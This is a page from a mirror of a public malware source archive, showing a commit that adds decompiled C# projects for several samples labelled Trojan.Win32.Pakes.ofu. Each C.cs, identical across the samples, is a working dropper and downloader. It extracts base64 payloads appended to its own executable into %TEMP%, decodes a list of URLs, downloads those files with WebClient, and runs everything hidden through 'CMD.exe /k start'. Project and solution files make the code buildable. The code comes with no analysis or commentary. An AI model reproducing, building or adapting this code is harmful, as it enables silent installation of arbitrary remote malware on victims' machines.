daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-16 15:59:24 +00:00
Code Issues Projects Releases Wiki Activity

auto-decompiled msil via petikvx

Browse Source 
add
This commit is contained in:
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-25e8fc195a385066e680fc2fa54f23e0d4e8e119fa566f97d4c27b0b12ebd8e5/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-25e8fc195a385066e680fc2fa54f23e0d4e8e119fa566f97d4c27b0b12ebd8e5/C.cs
+133
View File
@@ -0,0 +1,133 @@
// Decompiled with JetBrains decompiler
// Type: n.C
// Assembly: g, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BF8D38A2-3CA7-4EC1-9420-BC56FCE07E26
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-25e8fc195a385066e680fc2fa54f23e0d4e8e119fa566f97d4c27b0b12ebd8e5.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Net;
using System.Text;
namespace n
{
public class C
{
[STAThread]
public static void main()
{
string str1 = "CMD.exe /k start %TEMP%\\";
string Expression1 = "TEMP";
try
{
C c1 = new C();
Array Instance1 = (Array) Strings.Split(System.IO.File.ReadAllText(AppDomain.CurrentDomain.FriendlyName), "**");
Array Instance2 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 1
}, (string[]) null)), "&");
Array Instance3 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 0
}, (string[]) null)), "\r\n");
Array Instance4 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 1
}, (string[]) null)), "\r\n");
int num1 = checked (Instance4.Length - 2);
int num2 = 0;
while (num2 <= num1)
{
try
{
System.IO.File.WriteAllBytes(Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\" + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), c1.v(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance4, new object[1]
{
(object) num2
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
checked { ++num2; }
}
if (Operators.CompareString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 2
}, (string[]) null).ToString(), "^", false) == 0)
return;
C c2 = c1;
Array Instance5 = Instance1;
object[] objArray1 = new object[1];
object[] objArray2 = objArray1;
int num3 = 2;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) num3;
objArray2[0] = (object) local1;
object[] Arguments = objArray1;
string str2 = Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance5, Arguments, (string[]) null));
ref string local2 = ref str2;
string Expression2 = c2.t(ref local2);
NewLateBinding.LateIndexSetComplex((object) Instance1, new object[2]
{
(object) num3,
(object) str2
}, (string[]) null, true, false);
Array array = (Array) Strings.Split(Expression2, "\r\n");
int num4 = 0;
try
{
foreach (object obj in array)
{
string str3 = Conversions.ToString(obj);
try
{
if (Operators.CompareString(str3, "", false) == 0)
ProjectData.EndApp();
Array Instance6 = (Array) Strings.Split(str3, ".");
new WebClient().DownloadFile(str3, Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + "F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))), AppWinStyle.Hide);
checked { ++num4; }
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public byte[] v(string s) => Convert.FromBase64String(s);
public string t(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-25e8fc195a385066e680fc2fa54f23e0d4e8e119fa566f97d4c27b0b12ebd8e5/Trojan.Win32.Pakes.ofu.csproj
+41
View File
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-25e8fc195a385066e680fc2fa54f23e0d4e8e119fa566f97d4c27b0b12ebd8e5.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{0B110C2F-2FD2-4496-B4D0-E4C3A5120AAA}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>g</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>n</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="C.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-25e8fc195a385066e680fc2fa54f23e0d4e8e119fa566f97d4c27b0b12ebd8e5/Trojan.Win32.Pakes.ofu.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "g", "Trojan.Win32.Pakes.ofu-25e8fc195a385066e680fc2fa54f23e0d4e8e119fa566f97d4c27b0b12ebd8e5.csproj", "{0B110C2F-2FD2-4496-B4D0-E4C3A5120AAA}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{0B110C2F-2FD2-4496-B4D0-E4C3A5120AAA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{0B110C2F-2FD2-4496-B4D0-E4C3A5120AAA}.Debug|Any CPU.Build.0 = Debug|Any CPU
{0B110C2F-2FD2-4496-B4D0-E4C3A5120AAA}.Release|Any CPU.ActiveCfg = Release|Any CPU
{0B110C2F-2FD2-4496-B4D0-E4C3A5120AAA}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-873a343cb63109941836b54a86a0bc4309b1ed0f7b6f17e1cb45a08be013d73e/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-873a343cb63109941836b54a86a0bc4309b1ed0f7b6f17e1cb45a08be013d73e/C.cs
+133
View File
@@ -0,0 +1,133 @@
// Decompiled with JetBrains decompiler
// Type: n.C
// Assembly: g, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BF8D38A2-3CA7-4EC1-9420-BC56FCE07E26
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-873a343cb63109941836b54a86a0bc4309b1ed0f7b6f17e1cb45a08be013d73e.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Net;
using System.Text;
namespace n
{
public class C
{
[STAThread]
public static void main()
{
string str1 = "CMD.exe /k start %TEMP%\\";
string Expression1 = "TEMP";
try
{
C c1 = new C();
Array Instance1 = (Array) Strings.Split(System.IO.File.ReadAllText(AppDomain.CurrentDomain.FriendlyName), "**");
Array Instance2 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 1
}, (string[]) null)), "&");
Array Instance3 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 0
}, (string[]) null)), "\r\n");
Array Instance4 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 1
}, (string[]) null)), "\r\n");
int num1 = checked (Instance4.Length - 2);
int num2 = 0;
while (num2 <= num1)
{
try
{
System.IO.File.WriteAllBytes(Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\" + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), c1.v(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance4, new object[1]
{
(object) num2
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
checked { ++num2; }
}
if (Operators.CompareString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 2
}, (string[]) null).ToString(), "^", false) == 0)
return;
C c2 = c1;
Array Instance5 = Instance1;
object[] objArray1 = new object[1];
object[] objArray2 = objArray1;
int num3 = 2;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) num3;
objArray2[0] = (object) local1;
object[] Arguments = objArray1;
string str2 = Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance5, Arguments, (string[]) null));
ref string local2 = ref str2;
string Expression2 = c2.t(ref local2);
NewLateBinding.LateIndexSetComplex((object) Instance1, new object[2]
{
(object) num3,
(object) str2
}, (string[]) null, true, false);
Array array = (Array) Strings.Split(Expression2, "\r\n");
int num4 = 0;
try
{
foreach (object obj in array)
{
string str3 = Conversions.ToString(obj);
try
{
if (Operators.CompareString(str3, "", false) == 0)
ProjectData.EndApp();
Array Instance6 = (Array) Strings.Split(str3, ".");
new WebClient().DownloadFile(str3, Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + "F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))), AppWinStyle.Hide);
checked { ++num4; }
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public byte[] v(string s) => Convert.FromBase64String(s);
public string t(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-873a343cb63109941836b54a86a0bc4309b1ed0f7b6f17e1cb45a08be013d73e/Trojan.Win32.Pakes.ofu.csproj
+41
View File
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-873a343cb63109941836b54a86a0bc4309b1ed0f7b6f17e1cb45a08be013d73e.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{0129350B-04DD-4692-8B44-3346B917343B}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>g</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>n</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="C.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-873a343cb63109941836b54a86a0bc4309b1ed0f7b6f17e1cb45a08be013d73e/Trojan.Win32.Pakes.ofu.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "g", "Trojan.Win32.Pakes.ofu-873a343cb63109941836b54a86a0bc4309b1ed0f7b6f17e1cb45a08be013d73e.csproj", "{0129350B-04DD-4692-8B44-3346B917343B}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{0129350B-04DD-4692-8B44-3346B917343B}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{0129350B-04DD-4692-8B44-3346B917343B}.Debug|Any CPU.Build.0 = Debug|Any CPU
{0129350B-04DD-4692-8B44-3346B917343B}.Release|Any CPU.ActiveCfg = Release|Any CPU
{0129350B-04DD-4692-8B44-3346B917343B}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-8b62968991a246db6bea26242d4308b0eef7c30da89d5072329aa6fa5592a700/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-8b62968991a246db6bea26242d4308b0eef7c30da89d5072329aa6fa5592a700/C.cs
+133
View File
@@ -0,0 +1,133 @@
// Decompiled with JetBrains decompiler
// Type: n.C
// Assembly: g, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BF8D38A2-3CA7-4EC1-9420-BC56FCE07E26
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-8b62968991a246db6bea26242d4308b0eef7c30da89d5072329aa6fa5592a700.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Net;
using System.Text;
namespace n
{
public class C
{
[STAThread]
public static void main()
{
string str1 = "CMD.exe /k start %TEMP%\\";
string Expression1 = "TEMP";
try
{
C c1 = new C();
Array Instance1 = (Array) Strings.Split(System.IO.File.ReadAllText(AppDomain.CurrentDomain.FriendlyName), "**");
Array Instance2 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 1
}, (string[]) null)), "&");
Array Instance3 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 0
}, (string[]) null)), "\r\n");
Array Instance4 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 1
}, (string[]) null)), "\r\n");
int num1 = checked (Instance4.Length - 2);
int num2 = 0;
while (num2 <= num1)
{
try
{
System.IO.File.WriteAllBytes(Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\" + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), c1.v(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance4, new object[1]
{
(object) num2
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
checked { ++num2; }
}
if (Operators.CompareString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 2
}, (string[]) null).ToString(), "^", false) == 0)
return;
C c2 = c1;
Array Instance5 = Instance1;
object[] objArray1 = new object[1];
object[] objArray2 = objArray1;
int num3 = 2;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) num3;
objArray2[0] = (object) local1;
object[] Arguments = objArray1;
string str2 = Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance5, Arguments, (string[]) null));
ref string local2 = ref str2;
string Expression2 = c2.t(ref local2);
NewLateBinding.LateIndexSetComplex((object) Instance1, new object[2]
{
(object) num3,
(object) str2
}, (string[]) null, true, false);
Array array = (Array) Strings.Split(Expression2, "\r\n");
int num4 = 0;
try
{
foreach (object obj in array)
{
string str3 = Conversions.ToString(obj);
try
{
if (Operators.CompareString(str3, "", false) == 0)
ProjectData.EndApp();
Array Instance6 = (Array) Strings.Split(str3, ".");
new WebClient().DownloadFile(str3, Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + "F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))), AppWinStyle.Hide);
checked { ++num4; }
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public byte[] v(string s) => Convert.FromBase64String(s);
public string t(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-8b62968991a246db6bea26242d4308b0eef7c30da89d5072329aa6fa5592a700/Trojan.Win32.Pakes.ofu.csproj
+41
View File
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-8b62968991a246db6bea26242d4308b0eef7c30da89d5072329aa6fa5592a700.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{DEE76809-D1B4-4A67-95CD-3C9206BAFECF}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>g</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>n</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
</ItemGroup>
<ItemGroup>
<Compile Include="C.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-8b62968991a246db6bea26242d4308b0eef7c30da89d5072329aa6fa5592a700/Trojan.Win32.Pakes.ofu.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "g", "Trojan.Win32.Pakes.ofu-8b62968991a246db6bea26242d4308b0eef7c30da89d5072329aa6fa5592a700.csproj", "{DEE76809-D1B4-4A67-95CD-3C9206BAFECF}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{DEE76809-D1B4-4A67-95CD-3C9206BAFECF}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{DEE76809-D1B4-4A67-95CD-3C9206BAFECF}.Debug|Any CPU.Build.0 = Debug|Any CPU
{DEE76809-D1B4-4A67-95CD-3C9206BAFECF}.Release|Any CPU.ActiveCfg = Release|Any CPU
{DEE76809-D1B4-4A67-95CD-3C9206BAFECF}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-9c0e9addf7e09323776486d50764f39d7556b844377e327710c138cb308804d0/AssemblyInfo.cs
+3
View File
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-9c0e9addf7e09323776486d50764f39d7556b844377e327710c138cb308804d0/C.cs
+133
View File
@@ -0,0 +1,133 @@
// Decompiled with JetBrains decompiler
// Type: n.C
// Assembly: g, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BF8D38A2-3CA7-4EC1-9420-BC56FCE07E26
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-9c0e9addf7e09323776486d50764f39d7556b844377e327710c138cb308804d0.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Collections;
using System.Net;
using System.Text;
namespace n
{
public class C
{
[STAThread]
public static void main()
{
string str1 = "CMD.exe /k start %TEMP%\\";
string Expression1 = "TEMP";
try
{
C c1 = new C();
Array Instance1 = (Array) Strings.Split(System.IO.File.ReadAllText(AppDomain.CurrentDomain.FriendlyName), "**");
Array Instance2 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 1
}, (string[]) null)), "&");
Array Instance3 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 0
}, (string[]) null)), "\r\n");
Array Instance4 = (Array) Strings.Split(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance2, new object[1]
{
(object) 1
}, (string[]) null)), "\r\n");
int num1 = checked (Instance4.Length - 2);
int num2 = 0;
while (num2 <= num1)
{
try
{
System.IO.File.WriteAllBytes(Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\" + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), c1.v(Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance4, new object[1]
{
(object) num2
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + Conversions.ToString(num2) + "."), NewLateBinding.LateIndexGet((object) Instance3, new object[1]
{
(object) num2
}, (string[]) null))), AppWinStyle.Hide);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
checked { ++num2; }
}
if (Operators.CompareString(NewLateBinding.LateIndexGet((object) Instance1, new object[1]
{
(object) 2
}, (string[]) null).ToString(), "^", false) == 0)
return;
C c2 = c1;
Array Instance5 = Instance1;
object[] objArray1 = new object[1];
object[] objArray2 = objArray1;
int num3 = 2;
// ISSUE: variable of a boxed type
__Boxed<int> local1 = (ValueType) num3;
objArray2[0] = (object) local1;
object[] Arguments = objArray1;
string str2 = Conversions.ToString(NewLateBinding.LateIndexGet((object) Instance5, Arguments, (string[]) null));
ref string local2 = ref str2;
string Expression2 = c2.t(ref local2);
NewLateBinding.LateIndexSetComplex((object) Instance1, new object[2]
{
(object) num3,
(object) str2
}, (string[]) null, true, false);
Array array = (Array) Strings.Split(Expression2, "\r\n");
int num4 = 0;
try
{
foreach (object obj in array)
{
string str3 = Conversions.ToString(obj);
try
{
if (Operators.CompareString(str3, "", false) == 0)
ProjectData.EndApp();
Array Instance6 = (Array) Strings.Split(str3, ".");
new WebClient().DownloadFile(str3, Conversions.ToString(Operators.ConcatenateObject((object) (Interaction.Environ(Expression1) + "\\F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))));
Interaction.Shell(Conversions.ToString(Operators.ConcatenateObject((object) (str1 + "F" + Conversions.ToString(num4) + "."), NewLateBinding.LateIndexGet((object) Instance6, new object[1]
{
(object) checked (Instance6.Length - 1)
}, (string[]) null))), AppWinStyle.Hide);
checked { ++num4; }
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public byte[] v(string s) => Convert.FromBase64String(s);
public string t(ref string s) => Encoding.UTF8.GetString(Convert.FromBase64String(s));
}
}
MSIL/Trojan/Win32/P/Trojan.Win32.Pakes.ofu-9c0e9addf7e09323776486d50764f39d7556b844377e327710c138cb308804d0/Trojan.Win32.Pakes.ofu.csproj
+41
View File
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Pakes.ofu-9c0e9addf7e09323776486d50764f39d7556b844377e327710c138cb308804d0.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{6EDE12CE-6227-4D5B-8BDA-873B05B7D2A9}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>g</AssemblyName>
